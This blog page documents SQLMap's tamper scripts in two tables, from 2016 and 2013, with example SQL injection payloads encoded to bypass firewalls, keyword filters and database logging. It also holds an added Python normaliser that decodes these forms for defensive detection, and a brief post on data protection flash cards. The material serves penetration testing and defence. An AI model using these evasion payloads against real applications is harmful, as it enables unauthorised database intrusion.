4.7.16

SQLMap Tamper Scripts Update


My last post on this from three years ago was pretty well received, but given the rate at which SQLMap is developed it is now definitely behind.

Here's an updated table of all the tamper scripts included with the latest version (as of the time of writing, 04/July/2016).

I will be putting something together, possibly as a commit to the SQLMap project, to aid with these. I'll update once it's done, so stay tuned.



| Name | Description | Example |
|---|---|---|
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full-width counterpart | '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double-unicode counterpart | '1 AND %271%27=%271' |
| appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload | '1 AND 1=1' |
| base64encode.py | Base64-encodes all characters in a given payload | 'MScgQU5EIFNMRUVQKDUpIw==' |
| between.py | Replaces the greater-than operator ('>') with 'NOT BETWEEN 0 AND #' | '1 AND A NOT BETWEEN 0 AND B--' |
| bluecoat.py | Replaces the space character after an SQL statement with a valid random blank character; afterwards replaces the '=' character with the LIKE operator | 'SELECT%09id FROM users where id LIKE 1' |
| chardoubleencode.py | Double URL-encodes all characters in a given payload (not processing already encoded ones) | '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | 'LIMIT 3 OFFSET 2' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | 'MID(VERSION() FROM 1 FOR 1)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' | 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' |
| charencode.py | URL-encodes all characters in a given payload (not processing already encoded ones) | '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' |
| charunicodeencode.py | Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded ones) | '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' |
| equaltolike.py | Replaces all occurrences of the equals operator ('=') with the 'LIKE' operator | 'SELECT * FROM users WHERE id LIKE 1' |
| escapequotes.py | Slash-escapes quotes (' and ") | '1\\\\" AND SLEEP(5)#' |
| greatest.py | Replaces the greater-than operator ('>') with its 'GREATEST' counterpart | '1 AND GREATEST(A,B+1)=A' |
| halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword | "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | 'IF(ISNULL(1),2,1)' |
| modsecurityversioned.py | Wraps the complete query in a versioned comment | '1 /*!30874AND 2>1*/--' |
| modsecurityzeroversioned.py | Wraps the complete query in a zero-versioned comment | '1 /*!00000AND 2>1*/--' |
| multiplespaces.py | Adds multiple spaces around SQL keywords | '1 UNION SELECT foobar' |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for bypassing replacement filters (e.g. .replace("SELECT", "")) | '1 UNIOUNIONN SELESELECTCT 2--' |
| percentage.py | Adds a percentage sign ('%') in front of each character | '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' |
| overlongutf8.py | Converts all non-alphanumeric characters in a given payload to overlong UTF-8 (not processing already encoded ones) | 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1' |
| randomcase.py | Replaces each keyword character with a random-case value | 'INseRt' |
| randomcomments.py | Adds random comments to SQL keywords | 'I/**/N/**/SERT' |
| securesphere.py | Appends a specially crafted string | "1 AND 1=1 and '0having'='0having'" |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | '1 AND 9227=9227-- sp_password' |
| space2comment.py | Replaces the space character (' ') with comments '/**/' | 'SELECT/**/id/**/FROM/**/users' |
| space2dash.py | Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' |
| space2hash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' |
| space2morehash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' |
| space2mssqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Eid%0DFROM%07users' |
| space2mssqlhash.py | Replaces the space character (' ') with a pound character ('#') followed by a new line ('\n') | '1%23%0AAND%23%0A9227=9227' |
| space2mysqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%A0id%0BFROM%0Cusers' |
| space2mysqldash.py | Replaces the space character (' ') with a dash comment ('--') followed by a new line ('\n') | '1--%0AAND--%0A9227=9227' |
| space2plus.py | Replaces the space character (' ') with a plus ('+') | 'SELECT+id+FROM+users' |
| space2randomblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Did%0DFROM%0Ausers' |
| symboliclogical.py | Replaces the AND and OR logical operators with their symbolic counterparts (&& and \|\|) | "1 %26%26 '1'='1" |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | '-1 UNION SELECT' |
| unmagicquotes.py | Replaces the quote character (') with the multi-byte combo %bf%27, together with a generic comment at the end (to make it work) | '1%bf%27 AND 1=1-- ' |
| uppercase.py | Replaces each keyword character with its upper-case value | 'INSERT' |
| varnish.py | Appends an HTTP header 'X-originating-IP' | http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 |
| versionedkeywords.py | Encloses each non-function keyword in a versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' |
| versionedmorekeywords.py | Encloses each keyword in a versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' |
| xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' | ' headers["X-Forwarded-For"]' |
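The table makes the defender's problem obvious: every script leaves the injected SQL intact and only changes its surface form, so a filter that matches on the raw parameter is beaten by whichever encoding it did not think of. As an added example (this is not code from the post or from the sqlmap project), the Python below normalises a parameter first and matches signatures on the result, so the differently tampered forms of one injection collapse onto a single string. The sample payloads are the examples from the table; the signature list, the benign values and the helper names are constructed here for illustration.

```python
"""Canonicalise a request parameter before signature matching.

Added example, not code from the post or from the sqlmap project. It reverses
the encoding, comment and whitespace tricks from the tamper table so that
different tampered forms of one injection collapse onto a single string.
Sample payloads are the table's examples; signatures and benign values are
constructed here.
"""
import base64
import re
import unicodedata
from typing import List
from urllib.parse import unquote_to_bytes


def _try_base64(s: str) -> str:
    """base64encode.py: if the whole value is base64 and decodes to printable ASCII, use that."""
    if '%' in s or len(s) % 4 or not re.fullmatch(r'[A-Za-z0-9+/]+={0,2}', s):
        return s
    try:
        text = base64.b64decode(s, validate=True).decode('ascii')
    except (ValueError, UnicodeDecodeError):
        return s
    return text if text.isprintable() else s


def decode_layers(s: str, max_rounds: int = 3) -> str:
    """Peel URL-encoding (single and double), %uXXXX escapes and overlong UTF-8."""
    for _ in range(max_rounds):
        # charunicodeencode.py: IIS-style %uXXXX escapes
        s = re.sub(r'%u([0-9A-Fa-f]{4})', lambda m: chr(int(m.group(1), 16)), s)
        raw = unquote_to_bytes(s)
        # overlongutf8.py: a C0/C1 lead byte plus one continuation byte smuggles an ASCII code point
        raw = re.sub(rb'([\xC0\xC1])([\x80-\xBF])',
                     lambda m: bytes([((m.group(1)[0] & 0x1F) << 6) | (m.group(2)[0] & 0x3F)]),
                     raw)
        text = raw.decode('utf-8', errors='surrogateescape')
        # bytes that are not valid UTF-8 survive as U+DC80..U+DCFF: 0xA0 is a MySQL blank
        # (space2mysqlblank.py); anything else (the %bf of unmagicquotes.py) is dropped
        text = text.replace('\udca0', ' ')
        text = re.sub('[\udc80-\udcff]', '', text)
        if text == s:
            break
        s = text
    return s


def canonicalize(payload: str) -> str:
    """Return a normalised, upper-cased form suitable for signature matching."""
    s = decode_layers(_try_base64(payload))
    s = unicodedata.normalize('NFKC', s)                     # apostrophemask.py: U+FF07 -> '
    s = re.sub(r'/\*!\d*(.*?)\*/', r' \1 ', s, flags=re.S)  # versioned comments execute their body
    s = re.sub(r'/\*.*?\*/', ' ', s, flags=re.S)             # plain block comments are blanks
    s = re.sub(r'/\*!\d*', ' ', s)                           # halfversionedmorekeywords.py: unclosed openers
    s = re.sub(r'(?:--|#)[^\n]*', ' ', s)                    # line comments run to end of line
    s = s.replace('&&', ' AND ').replace('||', ' OR ')       # symboliclogical.py
    s = re.sub(r'[\x00-\x20\x7f\xa0+]+', ' ', s)             # NUL, controls, NBSP and '+' all act as blanks
    s = s.strip().upper()                                    # randomcase.py
    s = re.sub(r'\bLIKE\b', '=', s)                          # equaltolike.py / bluecoat.py
    return re.sub(r'\s*([=,()<>])\s*', r'\1', s)             # tighten spacing around operators


# Constructed signatures; they are applied to the canonical form only.
SIGNATURES = {
    'union-select': re.compile(r'\bUNION(?: ALL)? SELECT\b'),
    'boolean-test': re.compile(r"\b(?:AND|OR) '?\w+'?[=<>]'?\w+"),
    'time-based':   re.compile(r'\b(?:SLEEP|BENCHMARK|WAITFOR)\b'),
    'select-from':  re.compile(r'\bSELECT\b.*\bFROM\b'),
}


def classify(payload: str) -> List[str]:
    """Names of the signatures that fire on the canonical form of the payload."""
    canon = canonicalize(payload)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]


# Constructed sample input: tampered forms taken from the table above, plus benign values.
TAMPERED = {
    'apostrophemask': '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871',
    'apostrophenullencode': '1 AND %271%27=%271',
    'base64encode': 'MScgQU5EIFNMRUVQKDUpIw==',
    'chardoubleencode': '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520'
                        '%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545',
    'charunicodeencode': '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C'
                         '%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045',
    'modsecurityversioned': '1 /*!30874AND 2>1*/--',
    'space2hash': '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227',
    'space2mysqlblank': 'SELECT%A0id%0BFROM%0Cusers',
    'symboliclogical': "1 %26%26 '1'='1",
    'unmagicquotes': '1%bf%27 AND 1=1-- ',
    'versionedkeywords': '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),'
                         'IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#',
}
BENIGN = ['42', "O'Brien", 'hello+world']

if __name__ == '__main__':
    for name, payload in TAMPERED.items():
        print(f'{name:22} -> {canonicalize(payload)!r} {classify(payload)}')
```

Two caveats worth keeping in mind when reading the output. Block comments are treated as whitespace, which is the reading that suits space2comment.py; randomcomments.py relies on the DBMS lexer dropping them inside a keyword instead, so a normaliser that follows one interpretation can miss the other. And nonrecursivereplacement.py exists precisely because `.replace("SELECT", "")` style filters are self-defeating; normalise-then-match avoids that trap, but none of this substitutes for parameterised queries on the application side.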

7.5.15

Data Protection Flash Cards

Over at Designing for Privacy they've come up with a fantastic new way of raising data protection issues during the design process.

Their set of flash cards is split into four categories (constraints / regulation / system / users) and can be used to conceptualize the legal, moral and ethical responsibilities of the parties involved while a system is being designed.

To take a look head on over to www.designingforprivacy.co.uk where you can also find the downloadable versions to print.

15.5.13

SQLMap's Tamper Scripts

THIS POST IS OUTDATED, PLEASE SEE LATEST VERSION HERE

I've been playing with SQLMap a lot recently to automate all sorts of injections; something that isn't so well documented is the set of tamper scripts that come with it.

Here's a table with a short explanation of what each one does; maybe someone will find it useful.


| Name | Description | Example |
|---|---|---|
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full-width counterpart | '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double-unicode counterpart | '1 AND %271%27=%271' |
| appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload | '1 AND 1=1' |
| base64encode.py | Base64-encodes all characters in a given payload | 'MScgQU5EIFNMRUVQKDUpIw==' |
| between.py | Replaces the greater-than operator ('>') with 'NOT BETWEEN 0 AND #' | '1 AND A NOT BETWEEN 0 AND B--' |
| bluecoat.py | Replaces the space character after an SQL statement with a valid random blank character; afterwards replaces the '=' character with the LIKE operator | 'SELECT%09id FROM users where id LIKE 1' |
| chardoubleencode.py | Double URL-encodes all characters in a given payload (not processing already encoded ones) | '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' |
| charencode.py | URL-encodes all characters in a given payload (not processing already encoded ones) | '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' |
| charunicodeencode.py | Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded ones) | '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' |
| equaltolike.py | Replaces all occurrences of the equals operator ('=') with the 'LIKE' operator | 'SELECT * FROM users WHERE id LIKE 1' |
| greatest.py | Replaces the greater-than operator ('>') with its 'GREATEST' counterpart | '1 AND GREATEST(A,B+1)=A' |
| halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword | "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | 'IF(ISNULL(1),2,1)' |
| modsecurityversioned.py | Wraps the complete query in a versioned comment | '1 /*!30874AND 2>1*/--' |
| modsecurityzeroversioned.py | Wraps the complete query in a zero-versioned comment | '1 /*!00000AND 2>1*/--' |
| multiplespaces.py | Adds multiple spaces around SQL keywords | '1 UNION SELECT foobar' |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for bypassing replacement filters (e.g. .replace("SELECT", "")) | '1 UNIOUNIONN SELESELECTCT 2--' |
| percentage.py | Adds a percentage sign ('%') in front of each character | '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' |
| randomcase.py | Replaces each keyword character with a random-case value | 'INseRt' |
| randomcomments.py | Adds random comments to SQL keywords | 'I/**/N/**/SERT' |
| securesphere.py | Appends a specially crafted string | "1 AND 1=1 and '0having'='0having'" |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | '1 AND 9227=9227-- sp_password' |
| space2comment.py | Replaces the space character (' ') with comments '/**/' | 'SELECT/**/id/**/FROM/**/users' |
| space2dash.py | Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' |
| space2hash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' |
| space2morehash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227' |
| space2mssqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Eid%0DFROM%07users' |
| space2mssqlhash.py | Replaces the space character (' ') with a pound character ('#') followed by a new line ('\n') | '1%23%0AAND%23%0A9227=9227' |
| space2mysqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%A0id%0BFROM%0Cusers' |
| space2mysqldash.py | Replaces the space character (' ') with a dash comment ('--') followed by a new line ('\n') | '1--%0AAND--%0A9227=9227' |
| space2plus.py | Replaces the space character (' ') with a plus ('+') | 'SELECT+id+FROM+users' |
| space2randomblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Did%0DFROM%0Ausers' |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | '-1 UNION SELECT' |
| unmagicquotes.py | Replaces the quote character (') with the multi-byte combo %bf%27, together with a generic comment at the end (to make it work) | '1%bf%27 AND 1=1-- ' |
| versionedkeywords.py | Encloses each non-function keyword in a versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' |
| versionedmorekeywords.py | Encloses each keyword in a versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' |